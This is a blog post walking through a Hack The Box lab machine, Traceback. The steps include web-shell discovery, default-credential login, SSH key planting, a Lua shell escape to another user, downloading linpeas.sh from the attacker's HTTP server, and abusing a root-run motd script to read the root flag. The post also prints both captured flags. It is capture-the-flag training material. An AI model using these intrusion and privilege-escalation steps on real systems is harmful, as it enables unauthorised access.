DEV Community

Cover image for Hack The Box write up for Traceback
Josh Kerr
Josh Kerr

Posted on • Originally published at josh.kerr.dev on

Hack The Box write up for Traceback

This article is my guide for hacking traceback, one of the retired machines at HackTheBox.eu. This is my first hacking guide, so hopefully i'm doing this correctly.

I enjoyed this box. It was right at my skill level and took me about two hours to complete.

For ethical hacking, I'm using Parrot Security Linux running in a VM.

To start, instead of using the target box's IP address, I created an /etc/hosts entry for it called traceback.htb. This change makes things a lot easier because I don't need to remember the IP address of the box.

sudo echo "10.10.10.181 >> /etc/hosts

Nmap initial scan

nmap -A traceback.htb

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 14:43 CDT
Nmap scan report for traceback.htb (10.10.10.181)
Host is up (0.061s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.38 seconds

Pretty simple scan. It looks like web and ssh are available.

Web site looks like this:

Hack The Box write up for Traceback

Viewing source on the website reveals this:

Hack The Box write up for Traceback

Hmm...

I decided to search google for that string:

Hack The Box write up for Traceback

It looks like we got a hit. I'm going to see if any of those shells are installed on this server, time for gobuster.

I took that list of shells from GitHub and dumped them into a text file called shells.txt. Let's see if we can find them on the server:

Hack The Box write up for Traceback

Now let's fire up gobuster:

Hack The Box write up for Traceback

We got a hit!

I loaded the page into the browser:

http://traceback.htb/smevk.php

And this came up:

Hack The Box write up for Traceback

Looking at the source code of the original on GitHub, I can see a default login embedded in code.

Hack The Box write up for Traceback

Username: admin
Password: admin

Let's try those.

Hack The Box write up for Traceback

...we are in. It looks like the current user is webadmin. After browsing around in the webadmin folder, I noticed that the /home/webadmin/.ssh folder is writable. We can upload an authorized_keys file with our key in it to gain access via ssh. Gaining ssh will be very helpful.

First, let's generate an ssh key:

ssh-keygen

Hack The Box write up for Traceback

Now let's copy the public key to authorized_keys:

cp traceback.pub authorized_keys

Now let's upload it via the form on the website:

Hack The Box write up for Traceback

Great, it took it. Now let's chmod the private key so we can use it.

chmod 600 traceback

Now let's ssh into the box:

ssh -I traceback webadmin@traceback.htb

Hack The Box write up for Traceback

We are in!

Hack The Box write up for Traceback

Let's see if there are any programs we can run as root:

sudo -l

Hack The Box write up for Traceback

Oh, this looks promising. I google luvit and found this:

Hack The Box write up for Traceback

Luvit looks like a Lua application. I went to gtfobins to see if I could exploit a Lua application.

Hack The Box write up for Traceback

And here is our strategy. First, I executed:

sudo -u sysadmin /home/sysadmin/luvit

The application prompted me to enter something. I typed in the command I got from gtfobins but used bash instead of sh:

os.execute("/bin/bash -i")

Now I've got access to sysadmin and the first flag!

Hack The Box write up for Traceback

Hack The Box write up for Traceback

11dadca21fe54bc8d753f61fc7a47ada

Now let's see if we can get root.

I downloaded linpeas.sh from here.

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

I tried to get it directly on the box, but that didn't work.

Hack The Box write up for Traceback

I'm going to download it to my local box and use python's built-in http server to upload it. I'm executing this in the same folder that linpeas.sh is in.

python -m SimpleHTTPServer

Now I can access it from the remote by calling:

wget http://10.10.14.26:8000/linpeas.sh

Hack The Box write up for Traceback

Let's make it executable:

chmod +x linpeas.sh

Now let's run linpeas.sh

./linpeas.sh

Hack The Box write up for Traceback

Scrolling through the output, I noticed this:

Hack The Box write up for Traceback

00-header seems to be the header message when you log in:

Hack The Box write up for Traceback

I decided to see if I could run "id" from that shell when I log in as webadmin. The command would tell me what priv's are being executed when that script is run.

echo "id" >> /etc/update-motd.d/00-header

When I log in, it should print out what user is executing that file. Hopefully root.

Hack The Box write up for Traceback

Boom root! Ok, let's exploit that. We know that the root flag is always /root/root.txt.

echo "cat /root/root.txt" >> /etc/update-motd.d/00-header

Now let's log in again.

Hack The Box write up for Traceback

And you can see the root flag printed:

b2a2c50f8f2c0d1acb6c0aaf090712c9

We are all done! We could've easily used that exploit to gain actual root on the box, but all I needed for this activity was the root flag. This box was fun! I highly recommend it.

Top comments (0)